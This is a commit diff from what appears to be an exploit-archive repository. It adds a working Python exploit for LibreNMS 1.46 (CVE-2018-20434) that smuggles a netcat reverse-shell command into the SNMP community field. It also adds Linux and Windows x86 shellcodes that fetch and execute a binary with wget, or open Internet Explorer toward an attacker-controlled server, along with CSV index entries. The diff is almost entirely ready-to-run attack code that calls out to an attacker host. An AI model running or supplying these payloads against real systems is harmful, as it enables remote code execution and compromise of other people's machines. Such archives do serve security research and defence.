DB: 2019-06-29

3 changes to exploits/shellcodes LibreNMS 1.46 - 'addhost' Remote Code Execution Windows/x86 - Start iexplore.exe Shellcode (191 Bytes) Linux/x86 - chmod + execute + hide output via /usr/bin/wget Shellcode (129 bytes)
2019-06-29 05:01:51 +00:00 · 2019-06-29 05:01:51 +00:00 · 70484f5916
commit 70484f5916
parent 5632d13fea
5 changed files with 293 additions and 0 deletions
--- a/exploits/php/webapps/47044.py
+++ b/exploits/php/webapps/47044.py
@ -0,0 +1,111 @@
+#!/usr/bin/python
+
+'''
+# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
+# Date: 24/12/2018
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE : CVE-2018-20434
+# Vendor Homepage: https://www.librenms.org/
+# Version: v1.46
+# Tested on: Ubuntu 18.04 / PHP 7.2.10
+'''
+
+import requests
+from urllib import urlencode
+import sys
+
+if len(sys.argv) != 5:
+    print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport"
+    sys.exit(0)
+
+# target (user input)
+target = sys.argv[1]
+
+# cookies (user input)
+raw_cookies = sys.argv[2]
+
+# remote host to connect to
+rhost = sys.argv[3]
+
+# remote port to connect to
+rport = sys.argv[4]
+
+# hostname to use (change it if you want)
+hostname = "dummydevice"
+
+# payload to create reverse shell
+payload = "'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f) #".format(rhost, rport)
+
+# request headers
+headers = {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101"
+    }
+
+# request cookies
+cookies = {}
+for cookie in raw_cookies.split(";"):
+    # print cookie
+    c = cookie.split("=")
+    cookies[c[0]] = c[1]
+
+
+def create_new_device(url):
+    raw_request = {
+        "hostname": hostname,
+        "snmp": "on",
+        "sysName": "",
+        "hardware": "",
+        "os": "",
+        "snmpver": "v2c",
+        "os_id": "",
+        "port": "",
+        "transport": "udp",
+        "port_assoc_mode": "ifIndex",
+        "community": payload,
+        "authlevel": "noAuthNoPriv",
+        "authname": "",
+        "authpass": "",
+        "cryptopass": "",
+        "authalgo": "MD5",
+        "cryptoalgo": "AES",
+        "force_add": "on",
+        "Submit": ""
+    }
+    full_url = url + "/addhost/"
+    request_body = urlencode(raw_request)
+
+    # send the device creation request
+    request = requests.post(
+        full_url, data=request_body, cookies=cookies, headers=headers
+    )
+    text = request.text
+    if "Device added" in text:
+        print "[+] Device Created Sucssfully"
+        return True
+    else:
+        print "[-] Cannot Create Device"
+        return False
+
+
+def request_exploit(url):
+    params = {
+        "id": "capture",
+        "format": "text",
+        "type": "snmpwalk",
+        "hostname": hostname
+        }
+
+    # send the payload call
+    request = requests.get(url + "/ajax_output.php",
+        params=params,
+        headers=headers,
+        cookies=cookies
+        )
+    text = request.text
+    if rhost in text:
+        print "[+] Done, check your nc !"
+
+
+if create_new_device(target):
+    request_exploit(target)
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -41438,3 +41438,4 @@ id,file,description,date,author,type,platform,port
 47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx,
 47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
 47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited  2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
+47044,exploits/php/webapps/47044.py,"LibreNMS 1.46 - 'addhost' Remote Code Execution",2019-06-28,Askar,webapps,php,80
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -974,3 +974,5 @@ id,file,description,date,author,type,platform
 47025,shellcodes/linux_x86-64/47025.c,"Linux/x86_64 - Reverse (0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode",2019-06-24,"Aron Mihaljevic",shellcode,linux_x86-64
 47040,shellcodes/linux_x86/47040.py,"Linux/x86 - ASCII AND_ SUB_ PUSH_ POPAD Encoder Shellcode",2019-06-27,"Petr Javorik",shellcode,linux_x86
 47041,shellcodes/windows_x86/47041.c,"Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)",2019-06-27,"Joseph McDonagh",shellcode,windows_x86
+47042,shellcodes/windows_x86/47042.c,"Windows/x86 - Start iexplore.exe Shellcode (191 Bytes)",2019-06-28,"Joseph McDonagh",shellcode,windows_x86
+47043,shellcodes/linux_x86/47043.c,"Linux/x86 - chmod + execute + hide output via /usr/bin/wget Shellcode (129 bytes)",2019-06-28,LockedByte,shellcode,linux_x86
--- a/shellcodes/linux_x86/47043.c
+++ b/shellcodes/linux_x86/47043.c
@ -0,0 +1,113 @@
+/**
+
+; Shellcode 129 Bytes
+; download (via wget) + chmod + execute shellcode + hide output
+;      Exec: /usr/bin/wget http://192.168.1.93//x > /dev/null 2>&1
+;
+
+global _start
+
+section .text
+
+_start:
+
+    ;fork
+    xor eax,eax
+    mov al,0x2
+    int 0x80
+    xor ebx,ebx
+    cmp eax,ebx
+    jz download
+
+    ; wait(NULL)
+    xor eax,eax
+    mov al,0x7
+    int 0x80
+
+    ; give execution permissions to the binary x
+    xor ecx,ecx
+    xor eax, eax
+    push eax
+    mov al, 0xf
+    push 0x78
+    mov ebx, esp
+    xor ecx, ecx
+    mov cx, 0x1ff
+    int 0x80
+
+    ; execution of binary x
+    xor eax, eax
+    push eax
+    push 0x78
+    mov ebx, esp
+    push eax
+    mov edx, esp
+    push ebx
+    mov ecx, esp
+    mov al, 11
+    int 0x80
+
+download:
+
+    push 0xb
+    pop eax
+    cdq
+    push edx
+    ; download uri
+    mov eax, 0x31263e32 ; 1&>2 hide_output[4]
+    mov eax, 0x6c6c756e ; llun/  hide_output[3]
+    mov eax, 0x2f766564 ; ved  hide_output[2]
+    mov eax, 0x2f3e20 ; />  hide_output[1]
+    mov eax, 0x782f2f ; x//  path[1]
+    mov eax, 0x33392e31 ;93.1 addr[3]
+    mov eax, 0x2e383631 ;.861 addr[2]
+    mov eax, 0x2e323931 ;.291  addr[1]
+    push eax
+    mov ecx,esp
+    push edx
+
+    ; download execution in /usr/bin/wget
+
+    push 0x74 ;t
+    push 0x6567772f ;egw/
+    push 0x6e69622f ;nib/
+    push 0x7273752f ;rsu/
+    mov ebx,esp
+    push edx
+    push ecx
+    push ebx
+    mov ecx,esp
+    int 0x80
+
+**/
+
+// nasm -felf32 wget.nasm -o wget.o
+// ld -m elf_i386 wget.o -o wget
+
+#include <stdio.h>
+#include <string.h>
+
+// gcc -z execstack -fno-stack-protector shellcode.c -o shellcode
+
+// SHELLCODE 129 Bytes
+
+char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8"
+"\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9"
+"\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31"
+"\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50"
+"\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1"
+"\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\xb8"
+"\x32\x3e\x26\x31\xb8\x6e\x75\x6c\x6c\xb8"
+"\x64\x65\x76\x2f\xb8\x20\x3e\x2f\x00\xb8"
+"\x2f\x2f\x78\x00\xb8\x31\x2e\x39\x33\xb8"
+"\x31\x36\x38\x2e\xb8\x31\x39\x32\x2e\x50"
+"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65"
+"\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72"
+"\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
+
+void main(int argc, char **argv)
+{
+        int (*func)();
+        func = (int (*)()) buf;
+        (int)(*func)();
+}
--- a/shellcodes/windows_x86/47042.c
+++ b/shellcodes/windows_x86/47042.c
@ -0,0 +1,66 @@
+/*
+# Title: start iexplore.exe
+# Author: Joseph McDonagh
+# Shellcode length 191
+# Could be smaller if the app your are exploiting loads msvcrt.
+# Purpose: Use the start command to open internet explorer and connect to a malicious web server
+# The command this runs is simply start iexplore.exe http://192.168.10.10/ (Attacker controlled server), which can lead to a more productive payload.
+# This code can exploit browser vulnerabilities without (or with) social engineering.
+# Tested on: WinXP SP 2
+# Thanks to Kartik Durg and sharing the shellcode entry 46281 and sharing the details on the iamroot blog https://iamroot.blog/2019/01/28/windows-shellcode-download-and-execute-payload-using-msiexec/.  This got me going in the right direction. And to POB. Using "start" is helpful for this type of payload.
+# Complile on Kali #i686-w64-mingw32-gcc sie.c -o sie.exe
+# 
+
+***** Assembly code follows *****
+
+; The portion loads msvcrt to make the syscall.
+; Hardcoded for winxp
+
+xor eax, eax             
+mov ax, 0x7472           
+push eax
+push dword 0x6376736d    
+push esp
+
+; LoadLibrary (hardcoded for Windows XP. 
+; Can find this on a debugger or arwin)
+mov ebx, 0x7c801d77    
+call ebx
+mov ebp, eax             
+
+xor eax, eax       
+PUSH eax                ; null terminator
+push 0x2f30312e	; /10.
+push 0x30312e38	; 01.8
+push 0x36312e32	; 61.2
+push 0x39312f2f	; 91//
+push 0x3a707474	; :ptt
+push 0x68206578	; h ex
+push 0x652e6572	; e.er
+push 0x6f6c7078	; olpx
+push 0x65692074	; ei t
+push 0x72617473	; rats
+
+; Below code moves the pointer and executes the system call that runs the command.
+
+mov edi,esp
+push edi
+mov eax, 0x77c293c7
+call eax
+
+xor eax, eax
+push eax
+mov eax, 0x7c81caa2
+call eax
+*/
+
+char code[]=
+
+"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x78\x65\x20\x68\x68\x72\x65\x2e\x65\x68\x78\x70\x6c\x6f\x68\x74\x20\x69\x65\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0";
+
+int main(int argc, char **argv)
+ {
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}